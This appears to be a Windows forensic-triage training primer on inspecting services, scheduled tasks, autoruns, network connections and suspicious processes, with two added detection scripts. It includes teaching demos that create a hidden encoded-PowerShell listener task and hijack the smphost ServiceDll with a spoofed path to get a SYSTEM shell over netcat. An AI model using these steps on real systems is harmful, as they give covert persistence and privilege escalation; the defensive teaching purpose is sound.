View only system services and display the Name, PID, and the path they are started from.

```powershell
Get-CimInstance Win32_Service | Select Name, ProcessId, PathName | more
```

Pipe into `ft -wrap` to see the full pathname.

```text
PS C:\Users\student> Get-CimInstance Win32_Service | Select Name, ProcessId, PathName | more

Name                 ProcessId Pathname
----                 --------- --------
AdobeARMservice           4624 "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
AJRouter                     0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestri...
ALG                          0 C:\WINDOWS\System32\alg.exe
AppIDSvc                     0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestri...
Appinfo                   7752 C:\WINDOWS\system32\svchost.exe -k netsvcs -p
AppReadiness                 0 C:\WINDOWS\System32\svchost.exe -k AppReadiness -p
AppXSvc                      0 C:\WINDOWS\system32\svchost.exe -k wsappx -p
AudioEndpointBuilder      3168 C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestric...
Audiosrv                  3920 C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestri...
-- More --
```

You can pull the Description of a service with Get-CimInstance, but not with Get-Service.

```text
PS C:\windows\system32> Get-CimInstance Win32_Service | Select Name,Description

Name                     Description
----                     -----------
AJRouter                 Routes AllJoyn messages for the local AllJoyn client...
ALG                      Provides support for 3rd party protocol plug-ins for...
AppIDSvc                 Determines and verifies the identity of an applicati...
Appinfo                  Facilitates the running of interactive applications ...
AppMgmt                  Processes installation, removal, and enumeration req...
AppReadiness             Gets apps ready for use the first time a user signs ...
AppVClient               Manages App-V users and virtual applications
AppXSvc                  Provides infrastructure support for deploying Store ...
AssignedAccessManagerSvc AssignedAccessManager Service supports kiosk experie...
AudioEndpointBuilder     Manages audio devices for the Windows Audio service....
Audiosrv                 Manages audio for Windows-based programs.  If this s...
```

View all services.

```powershell
Get-Service
```

```text
PS C:\Users\student> get-service | more

Status   Name               DisplayName
------   ----               -----------
Stopped  AarSvc_5d854       Agent Activation Runtime_5d854
Running  AdobeARMservice    Adobe Acrobat Update Service
Stopped  AJRouter           AllJoyn Router Service
Stopped  ALG                Application Layer Gateway Service
Stopped  AppIDSvc           Application Identity
-- More --
```

View a defined service, showing all properties in list format.
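The listings above show the service name, PID and PathName, but a validity check still has to be done by hand on each row. The following added example (not from the primer) automates the part that matters for triage: it extracts the executable from each `Win32_Service.PathName`, checks that it exists and carries a valid Authenticode signature, flags unquoted paths that contain spaces, and, for services hosted in svchost.exe, resolves the DLL that actually holds the service code from the `ServiceDll` value under the service's `Parameters` registry key. The function names are the example's own; `Get-AuthenticodeSignature`, `Get-ItemProperty` and the `Win32_Service` properties used are standard. Run it elevated so every service's configuration is readable.

```powershell
# Added example (not from the primer): validate the binary behind every service.
function Get-ServiceImage {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^\s*"([^"]+)"')   { return $Matches[1] }  # quoted path
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }  # unquoted, up to the first .exe
    return ($PathName -split '\s+')[0]
}

function Get-ServiceTriage {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $image = Get-ServiceImage $svc.PathName
        if (-not $image) { continue }   # nothing to check without a path
        $image = [Environment]::ExpandEnvironmentVariables($image)
        $notes = @()

        # An unquoted path with spaces is parsed ambiguously by the service controller.
        if ($svc.PathName -notmatch '^\s*"' -and $image -match ' ') {
            $notes += 'unquoted path with spaces'
        }

        if (-not (Test-Path -LiteralPath $image)) {
            $notes += 'image not found on disk'
            $sig = 'n/a'
        } else {
            # Catalog-signed Windows binaries also report Valid here.
            $sig = (Get-AuthenticodeSignature -LiteralPath $image).Status
            if ($sig -ne 'Valid') { $notes += "signature $sig" }
        }

        # svchost.exe is only a host: the service code is the ServiceDll.
        $serviceDll = $null
        if ($image -like '*\svchost.exe') {
            $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)\Parameters"
            $serviceDll = (Get-ItemProperty -Path $key -Name ServiceDll -ErrorAction SilentlyContinue).ServiceDll
            if ($serviceDll) {
                $serviceDll = [Environment]::ExpandEnvironmentVariables($serviceDll)
                if (-not (Test-Path -LiteralPath $serviceDll)) {
                    $notes += 'ServiceDll missing'
                } elseif ((Get-AuthenticodeSignature -LiteralPath $serviceDll).Status -ne 'Valid') {
                    $notes += 'ServiceDll not validly signed'
                }
            } else {
                $notes += 'svchost-hosted but no ServiceDll value'
            }
        }

        [pscustomobject]@{
            Name       = $svc.Name
            State      = $svc.State
            StartMode  = $svc.StartMode
            StartName  = $svc.StartName
            Image      = $image
            ServiceDll = $serviceDll
            Signature  = $sig
            Notes      = ($notes -join '; ')
        }
    }
}

# Show only the services that have something to look at.
Get-ServiceTriage | Where-Object Notes | Format-Table Name, StartName, Image, ServiceDll, Notes -Wrap
```

The `StartName` column is worth keeping in view alongside the notes: a service whose image fails its signature check and that runs as LocalSystem is a higher-priority lead than one running under a restricted service account.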
```powershell
get-service ALG | format-list *
```

```text
PS C:\Users\student> get-service ALG | format-list *

Name                : ALG
RequiredServices    : {}
CanPauseAndContinue : False
CanShutdown         : False
CanStop             : False
DisplayName         : Application Layer Gateway Service
DependentServices   : {}
MachineName         : .
ServiceName         : ALG
ServicesDependedOn  : {}
ServiceHandle       :
Status              : Stopped
ServiceType         : Win32OwnProcess
StartType           : Manual
Site                :
Container           :
```

View only currently running services.

```powershell
Get-Service | Where-Object {$_.Status -eq "Running"}
```

```text
PS C:\Users\student> Get-Service | Where-Object {$_.Status -eq "Running"} | more

Status   Name               DisplayName
------   ----               -----------
Running  AdobeARMservice    Adobe Acrobat Update Service
Running  Appinfo            Application Information
Running  AppXSvc            AppX Deployment Service (AppXSVC)
Running  AudioEndpointBu... Windows Audio Endpoint Builder
Running  Audiosrv           Windows Audio
Running  BDESVC             BitLocker Drive Encryption Service
Running  BFE                Base Filtering Engine
-- More --
```

#### 4.3.2 View Services in Command Prompt

View services: `sc query`

Examples of the sc command:

- `sc /?` - basic service enumeration (usage and syntax)
- `sc qc <service>` - configuration information for a service
- `sc queryex eventlog` - information for the eventlog service, including its PID
- `sc qdescription eventlog` - query the eventlog service description
- `sc qc eventlog` - show the binary command that loads the service
- `sc showsid eventlog` - display the service SID and status
- `sc enumdepend eventlog` - list the services that cannot run unless the specified service is running

```cmd
sc query
```

```text
C:\Users\student>sc query | more

SERVICE_NAME: AdobeARMservice
DISPLAY_NAME: Adobe Acrobat Update Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: Appinfo
DISPLAY_NAME: Application Information
-- More --
```

Query the configuration information for the netlogon service.

```text
C:\windows\system32>sc qc netlogon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: netlogon
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\windows\system32\lsass.exe
        LOAD_ORDER_GROUP   : MS_WindowsRemoteValidation
        TAG                : 0
        DISPLAY_NAME       : Netlogon
        DEPENDENCIES       : LanmanWorkstation
        SERVICE_START_NAME : LocalSystem
```

View extended information for all services (sc requires a space after the `=` in its options).

```text
C:\Users\student>sc queryex type= service | more

SERVICE_NAME: AdobeARMservice
DISPLAY_NAME: Adobe Acrobat Update Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 4624
        FLAGS              :

SERVICE_NAME: Appinfo
DISPLAY_NAME: Application Information
-- More --
```

View extended information for all inactive services.
```text
C:\Users\student>sc queryex type= service state= inactive | more

SERVICE_NAME: AJRouter
DISPLAY_NAME: AllJoyn Router Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS
-- More --
```

Query information for the eventlog service, including its PID.

```text
C:\windows\system32>sc queryex eventlog

SERVICE_NAME: eventlog
        TYPE               : 30  WIN32
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 1296
        FLAGS              :
```

Use tasklist to find out which process is hosting the eventlog service.

```text
C:\windows\system32>tasklist /FI "pid eq 1296" /v

Image Name   PID Session Name Session# Mem Usage Status  User Name                  CPU Time Window Title
=========== ==== ============ ======== ========= ======= ========================== ======== ============
svchost.exe 1296 Services            0  12,468 K Unknown NT Authority\Local Service  0:00:02 N/A
```

Query the eventlog service description.

```text
C:\windows\system32>sc qdescription eventlog
[SC] QueryServiceConfig2 SUCCESS

SERVICE_NAME: eventlog
DESCRIPTION:  This service manages events and event logs. It supports logging events, querying events, subscribing to events, archiving event logs, and managing event metadata. It can display events in both XML and plain text format. Stopping this service may compromise security and reliability of the system.
```
Show the binary command that loads the eventlog service:

```
C:\windows\system32>sc qc eventlog
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: eventlog
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
        LOAD_ORDER_GROUP   : Event Log
        TAG                : 0
        DISPLAY_NAME       : Windows Event Log
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService
```

Display the service SID and status:

```
C:\windows\system32>sc showsid eventlog

NAME: eventlog
SERVICE SID: S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122
STATUS: Active
```

A service SID (also referred to as the service security principal) is a security identifier that allows permissions to be granted directly to a specific service.

List the services that cannot run unless the specified service is running:

```
C:\windows\system32>sc enumdepend eventlog
[SC] EnumDependentServices: entriesread = 4

SERVICE_NAME: Wecsvc
DISPLAY_NAME: Windows Event Collector
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: NcdAutoSetup
DISPLAY_NAME: Network Connected Devices Auto-Setup
        TYPE               : 30  WIN32
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
//==OUTPUT TRUNCATED==//
```

View all currently running services using net start:

```
C:\Users\student>net start | more
These Windows services are started:

   Adobe Acrobat Update Service
   Application Information
   AppX Deployment Service (AppXSVC)
   AVCTP service
   Background Tasks Infrastructure Service
   Base Filtering Engine
-- More --
```

The net start command starts a service or, with no arguments, lists the services that are currently running.

#### 4.3.3 View Services in the GUI

- services.msc: pull it up from the Windows search bar, or run `services.msc` in cmd.
- PsService (Sysinternals tool)
- Microsoft Reference

## 5. Scheduled Tasks

### 5.1 What are Scheduled Tasks?
Scheduled tasks launch programs or scripts when defined conditions are met, such as:

- A pre-set time (e.g. 0900 on Sundays)
- When the local machine boots up
- When a user logs on

Why they matter for triage:

- An easy way to hide malware and have it execute at set times.
- Separate files, such as a script, can be run from a scheduled task that in turn calls the malware.
- A good way to establish persistence.

### 5.2 How to view Scheduled Tasks

Task Scheduler is a job scheduler in Microsoft Windows that launches computer programs or scripts at pre-defined times or after specified time intervals.

#### 5.2.1 View Scheduled Tasks In PowerShell

View all properties of the first scheduled task:

```
Get-ScheduledTask | Select * | select -First 1
```

```
PS C:\Users\student> Get-ScheduledTask | Select * | select -First 1

State                 : Ready
Actions               : {MSFT_TaskExecAction}
Author                : Adobe Systems Incorporated
Date                  :
Description           : This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes
Documentation         :
Principal             : MSFT_TaskPrincipal2
SecurityDescriptor    :
Settings              : MSFT_TaskSettings3
Source                :
TaskName              : Adobe Acrobat Update Task
TaskPath              : \
Triggers              : {MSFT_TaskLogonTrigger, MSFT_TaskDailyTrigger}
URI                   : \Adobe Acrobat Update Task
Version               :
PSComputerName        :
CimClass              : Root/Microsoft/Windows/TaskScheduler:MSFT_ScheduledTask
CimInstanceProperties : {Actions, Author, Date, Description...}
CimSystemProperties   : Microsoft.Management.Infrastructure.CimSystemProperties
```

Unfortunately, the above command doesn't show you what the scheduled task is actually doing, because the Settings and the Triggers are displayed only as nested objects rather than their contents.
However, the following command shows you more.

#### 5.2.2 View Scheduled Tasks In Command Prompt

```
schtasks /query /tn "IchBinBosh" /v /fo list
```

```
Folder: \
HostName:                             ADMIN-STATION
TaskName:                             \IchBinBosh
Next Run Time:                        6/1/2021 5:02:00 PM
Status:                               Ready
Logon Mode:                           Interactive only
Last Run Time:                        6/1/2021 4:47:00 PM
Last Result:                          0
Author:                               ADMIN-STATION\andy.dwyer
Task To Run:                          powershell.exe -win hidden -encode JABMAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgANgA2ADYANgApADsAJABMAC4AUwB0AGEAcgB0ACgAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADYAMAA=
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          andy.dwyer
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Minute
Start Time:                           4:02:00 PM
Start Date:                           6/1/2021
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        0 Hour(s), 15 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled
```

Q: What odd command do we see occurring in the output above?
A: PowerShell is running an encoded string.

Q: How do we decode encoded strings?
A: The CyberChef website.

Note: Demo CyberChef.

#### 5.2.3 View Scheduled Tasks in the GUI

- Windows default Task Scheduler
- Sysinternals tool Autoruns. We'll go over this more in Sysinternal Tools.
- Microsoft Reference

#### 5.2.4 Autorun Registry Locations

Q: What are some Registry keys that can be used for autoruns?

Registry key locations, including locations connected with services:

```
HKLM\Software\Microsoft\Windows\CurrentVersion\Run       - Local Machine
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\System\CurrentControlSet\Services
```

Remember that each user has an individual hive with its own autoruns, in addition to the Current User hive.
```
HKCU\Software\Microsoft\Windows\CurrentVersion\Run        - Current User
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKU\<sid>\Software\Microsoft\Windows\CurrentVersion\Run   - Specific User
HKU\<sid>\Software\Microsoft\Windows\CurrentVersion\RunOnce
```

The order in which services are loaded can be adjusted under these keys:

```
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ServiceGroupOrder
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\GroupOrderList
```

### 5.3 DEMO: Create Task to open listening Port via the PowerShell Process

#### 5.3.1 Create IchBinBosh task

Creates a task that opens a listener on port 6666 every 15 minutes.

1. In CMD, run the following:

```
schtasks /Create /TN IchBinBosh /SC MINUTE /MO 15 /TR "powershell.exe -win hidden -encode JABMAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgANgA2ADYANgApADsAJABMAC4AUwB0AGEAcgB0ACgAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADYAMAA="
```

----- OR -----

2. If the script stops working, run the following commands instead in PowerShell to create a listening port:

```
$command = '$L=New-Object System.Net.Sockets.TcpListener(6666);$L.Start();Start-Sleep -s 60'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encodedCommand
```

#### 5.3.2 Confirm IchBinBosh exists and View Properties

In Command Prompt (Select-String is a PowerShell cmdlet, so use findstr here):

```
schtasks /query | findstr /i IchBinBosh
```

In PowerShell:

```
Get-ScheduledTask | Select * | select-string -pattern IchBinBosh -Context 2,4
```

In the GUI: show it in either Task Scheduler or Autoruns.

## 6. Network Connections

### 6.1 View Network Connections In PowerShell

Show all connections in the "Established" state.
```
Get-NetTCPConnection -State Established
```

```
PS C:\Users\andy.dwyer> Get-NetTCPConnection -State Established

LocalAddress LocalPort RemoteAddress RemotePort State       AppliedSetting OwningProcess
------------ --------- ------------- ---------- -----       -------------- -------------
10.23.0.2    49701     52.177.165.30 443        Established Internet       2988
10.23.0.2    22        10.250.0.15   59038      Established Internet       2944
```

### 6.2 View Network Connections in Command Prompt

Show the netstat help (`netstat /?`) and point out the following switches:

- -a  Displays all connections and listening ports
- -n  Displays addresses and port numbers in numerical form
- -o  Displays the owning process ID (PID) associated with each connection
- -b  Displays the executable involved in creating each connection (requires admin rights)

Display all TCP/UDP connections, with ports in numerical form and the PID and executable associated with each connection:

```
netstat -anob | more
```

```
andy.dwyer@ADMIN-STATION C:\Users\andy.dwyer>netstat -anob | more

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2944
 [sshd.exe]
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       832
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
 Can not obtain ownership information
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       304
  TermService
 [svchost.exe]
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       4456
  CDPSvc
-- More --
```

### 6.3 View Network Connections in the GUI

- TCPView. We will go over this in Sysinternal Tools.
- If you want to dig deeper: Microsoft Reference

## 7. Identifying Abnormalities/Suspicious Activity

Q: What are some abnormal things we could see in a process list?

- Misspelling of process names and descriptions, e.g. scvhost instead of svchost.
- The directory the process is running out of.
- Processes that have non-standard listening ports open, or connections sitting in SYN_SENT. For example, HTTP being used on any port other than 80 (HTTP over port 808 or 880).
- Multiple processes with the same name that should be unique, such as LSASS and SMSS.
- The System process with a high PID.
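The checks in this list applied to a process listing, as an added example that is not part of the primer: it parses tasklist /v rows and flags a System process whose PID is not 4, duplicates of single-instance processes, a high PID on a boot-time process, and names within a keystroke or two of a real one. The SAMPLE rows are constructed to mirror the "Where's Waldo" listing below, and BASELINE is a constructed allow-list; a real one comes from a known-good host of the same Windows build.

```python
import re
# Processes Windows runs exactly once (the LSASS/SMSS rule from the list above).
SINGLE_INSTANCE = {"smss.exe", "lsass.exe", "wininit.exe", "services.exe"}
HIGH_PID = 2000  # boot-time processes get low PIDs; a much higher one means a late restart
# Constructed allow-list; build the real one from a known-good host of the same build.
BASELINE = {
    "system idle process", "system", "registry", "smss.exe", "csrss.exe", "wininit.exe",
    "winlogon.exe", "services.exe", "lsass.exe", "svchost.exe", "fontdrvhost.exe",
    "dwm.exe", "explorer.exe", "conhost.exe", "cmd.exe", "regedit.exe", "dllhost.exe",
}
# Image name (may contain spaces), PID, session name and number; the rest of the row is ignored.
ROW = re.compile(r"^(?P<name>.+?)\s+(?P<pid>\d+)\s+(?P<session>Console|Services)\s+\d+\s+")
# Constructed tasklist /v rows, modelled on the "Where's Waldo" listing below.
SAMPLE = """\
Image Name                 PID Session Name  Session#  Mem Usage Status  User Name  CPU Time Window Title
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\\SYSTEM 368:23:24 N/A
System 4 Services 0 24 K Unknown N/A 0:13:27 N/A
smss.exe 288 Services 0 344 K Unknown N/A 0:00:00 N/A
csrss.exe 392 Services 0 1,768 K Unknown N/A 0:00:06 N/A
csrss.exe 476 Console 1 1,872 K Running N/A 0:00:16 N/A
lsass.exe 604 Services 0 11,980 K Unknown N/A 0:14:15 N/A
bad.exe 3648 Services 0 6,680 K Unknown N/A 0:00:00 N/A
smss.exe 8972 Console 1 14,412 K Running ARMY\\andy.dwyer 0:00:00 Installer Language
reqedit.exe 8760 Console 1 12,556 K Running ARMY\\andy.dwyer 0:00:00 PuTTY Configuration
regedit.exe 2624 Console 1 3,200 K Running ARMY\\andy.dwyer 0:00:00 Registry Editor
"""


def parse_tasklist(text):
    """(name, pid, session) for each data row; the header and separator rows do not match ROW."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append((m["name"], int(m["pid"]), m["session"]))
    return rows


def edit_distance(a, b):
    """Levenshtein distance, to catch names a keystroke or two away from a real one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalikes(name):
    """Baseline names within two edits of name; short names must match more closely."""
    return sorted(b for b in BASELINE if 0 < (d := edit_distance(name, b)) <= 2 and 4 * d <= len(name))


def triage(rows):
    """Findings as (pid, name, reason); an empty list means nothing stood out."""
    findings = []
    for name, pid, _ in rows:
        key = name.lower()
        if key == "system" and pid != 4:
            findings.append((pid, name, "System process does not have PID 4"))
        if key in SINGLE_INSTANCE and pid != min(p for n, p, _ in rows if n.lower() == key):
            findings.append((pid, name, "duplicate of a single-instance process"))  # lowest PID is the original
        if key in SINGLE_INSTANCE and pid > HIGH_PID:
            findings.append((pid, name, "high PID on a boot-time process"))
        if key not in BASELINE:
            near = lookalikes(key)
            findings.append((pid, name, f"possible misspelling of {', '.join(near)}" if near else "not in baseline"))
    return findings


if __name__ == "__main__":
    for pid, name, reason in triage(parse_tasklist(SAMPLE)):
        print(f"{pid:>6}  {name:<14} {reason}")
```

On the sample it reports bad.exe as not in the baseline, reqedit.exe as a likely misspelling of regedit.exe, and the second smss.exe both as a duplicate and as a high PID; the two csrss.exe rows are not flagged because csrss legitimately runs once per session.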
Also look at the handles or DLLs a process is using.

Dynamic Link Library (DLL):

- A non-standalone program that can be run by (linked to) multiple programs at the same time.
- Cannot be directly executed. Dependent on an exe to use as an entry point, such as RUNDLL.EXE (a process that calls on the functionality of the DLL).
- Allows developers to make minor changes without affecting other parts of the program.
- Microsoft Compromised DLLs
- DLL Hijacking

Q: Which directory are Windows executables typically run out of?

- System processes run from C:\Windows\System32.
- Third-party processes will run elsewhere, e.g. Chrome runs from C:\Program Files.

Q: Where's Waldo??? Using what we've learned so far, what stands out about this task list? (tasklist /v output; some rows are truncated as captured)

```
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 368:23:24 N/A
System 4 Services 0 24 K Unknown N/A 0:13:27 N/A
Registry 88 Services 0 46,944 K Unknown N/A 0:00:11 N/A
smss.exe 288 Services 0 344 K Unknown N/A 0:00:00 N/A
csrss.exe 392 Services 0 1,768 K Unknown N/A 0:00:06 N/A
wininit.exe 464 Services 0 876 K Unknown N/A 0:00:00 N/A
csrss.exe 476 Console 1 1,872 K Running N/A 0:00:16 N/A
winlogon.exe 560 Console 1 3,772 K Unknown N/A 0:00:00 N/A
services.exe 576 Services 0 8,756 K Unknown N/A 0:02:28 N/A
lsass.exe 604 Services 0 11,980 K Unknown N/A 0:14:15 N/A
svchost.exe 716 Services 0 908 K Unknown N/A 0:00:00 N/A
fontdrvhost.exe 724 Console 1 2,572 K Unknown N/A 0:00:01 N/A
fontdrvhost.exe 736 Services 0 680 K Unknown N/A 0:00:00 N/A
svchost.exe 800 Services 0 20,396 K Unknown N/A 0:04:37 N/A
svchost.exe 848 Services 0 10,804 K Unknown N/A 0:01:42 N/A
svchost.exe 896 Services 0 4,144 K Unknown N/A 0:01:05 N/A
dwm.exe 992 Console
firefox.exe 2396 Console 1 53,008 K Running ARMY\andy.dwyer 0:00:01 OleMainThreadWndName
cmd.exe 4372 Console 1 3,132 K Running ARMY\andy.dwyer 0:00:00 Command Prompt - tasklist /v
conhost.exe 4128 Console 1 19,536 K Running ARMY\andy.dwyer 0:00:18 N/A
firefox.exe 6952 Console 1 36,340 K Not Responding ARMY\andy.dwyer 0:00:00 OleMainThreadWndName
dllhost.exe 6324 Console 1 16,084 K Running ARMY\andy.dwyer 0:00:00 N/A
cmd.exe 5788 Console 1 3,204 K Running ARMY\andy.dwyer 0:00:00 C:\windows\system32\cmd.exe
conhost.exe 6240 Console 1 15,956 K Running ARMY\andy.dwyer 0:00:00 N/A
SecHealthUI.exe 1828 Console 1 54,808 K Running ARMY\andy.dwyer 0:00:03 CicMarshalWnd
dllhost.exe 7316 Console 1 9,532 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName
bad.exe 3648 Services 0 6,680 K Unknown N/A 0:00:00 N/A
conhost.exe 8604 Console 1 17,832 K Running ARMY\andy.dwyer 0:00:00 N/A
smartscreen.exe 5916 Console 1 20,268 K Unknown ARMY\andy.dwyer 0:00:00 N/A
smss.exe 8972 Console 1 14,412 K Running ARMY\andy.dwyer 0:00:00 Installer Language
svchost.exe 8976 Services 0 5,632 K Unknown N/A 0:00:00 N/A
WmiPrvSE.exe 9212 Services 0 8,824 K Unknown N/A 0:00:00 N/A
reqedit.exe 8760 Console 1 12,556 K Running ARMY\andy.dwyer 0:00:00 PuTTY Configuration
tasklist.exe 8308 Console
SystemSettingsBroker.exe 5600 Console 1 2,536 K Unknown ARMY\andy.dwyer 0:00:00 N/A
explorer.exe 5416 Console 1 19,276 K Running ARMY\andy.dwyer 0:00:30 N/A
MsMpEng.exe 6616 Services 0 88,688 K Unknown N/A 0:09:55 N/A
regedit.exe 2624 Console 1 3,200 K Running ARMY\andy.dwyer 0:00:00 Registry Editor
mmc.exe 3352 Console 1 5,380 K Running ARMY\andy.dwyer 0:00:02 OLEChannelWnd
svchost.exe 4200 Services 0 8,716 K Unknown N/A 0:00:01 N/A
dllhost.exe 4868 Console 1 6,236 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName
powershell_ise.exe 4940 Console 1 406,740 K Running ARMY\andy.dwyer 0:01:20 Windows PowerShell ISE
taskhostw.exe 5864 Console 1 7,524 K Running ARMY\andy.dwyer 0:00:00 Task Host Window
MicrosoftEdge.exe 6928 Console 1 712 K Running ARMY\andy.dwyer 0:00:00 Microsoft Edge
browser_broker.exe 1108 Console 1 972 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName
svchost.exe
```

A: High PID, duplicate, unfamiliar process name, and misspelling:
- Two smss.exe, one with a high PID of 8972
- bad.exe
- reqedit.exe

### 7.1 Demo: Manipulating SMPhost Service and Parameters

REQUIRES PAYLOAD.DLL AND NETCAT

Microsoft Storage Spaces SMP (smphost) Service Defaults in Windows 10

Storage Spaces is a technology in Windows and Windows Server that can help protect your data from drive failures. It is conceptually similar to RAID, implemented in software.

```
mkdir "C:\windows \"                  # keep the space and the quotes
dir                                   # show that our fake windows directory reads as if it were the real windows directory
cd "C:\windows \"                     # change directory to our fake windows folder
mkdir "c:\windows \system32 \"        # create our fake system32 folder
copy payload.dll "c:\windows \system32 \"   # copy the dll to our fake system32 directory
regedit.exe                           # open the GUI to visually show students the changes being made
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost   # locate this service in the registry
ObjectName = LocalSystem              # change this value to LocalSystem
Parameters -> ServiceDll = c:\windows \system32 \payload.dll   # put the location of the malicious DLL in the data field (keep the spacing)
netcat -lvp 7778                      # open another command prompt and run nc.exe -lvp 7778
net start smphost                     # start the service; you should get a SYSTEM shell in your nc.exe window
sc.exe queryex smphost                # query the smphost service and grab the PID of the running service
Get-Process | select name,id,path | where {$_.id -eq "PID#"}   # show that the malicious service runs as C:\windows\System32\svchost.exe (hard to find)
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost /s   # dump the registry contents and show the changes under the Parameters key
gci -Recurse -path hklm:\SYSTEM\CurrentControlSet\Services\smphost          # the same as the previous command, in PowerShell
whoami                                # in the netcat window, run whoami to show you are now SYSTEM
```

Q: Why would malware want to use services to hide itself? How does a service run compared to how a process runs?
A: Services can be used to easily hide malware. When services are set to start at boot, any executables attached to them also start with the service. Unlike a process, this happens without interaction from the user.

- Services.msc: the Windows GUI for editing and configuring services.
- sc: the built-in Windows command that can create, modify and delete services.

Q: What information are we looking for?

- Where the service executable (%PATH%) is started from.
- The name of the service, so you can look in the registry keys and in Services.msc for anything that stands out.
- Abnormal executables attached to the service, when the service starts and how, and especially whether the service has any network traffic.
- The dependencies and load order group, since they determine the order in which it loads and whether another service will load it in an attempt to blend in better.

A service group is a collection of services that are loaded together at system startup. If multiple drivers are configured to access the same device, the driver that is loaded first claims "ownership" of the device. This driver is then allowed to dictate the terms of shared ownership with other drivers, or can retain exclusive control for itself.

```
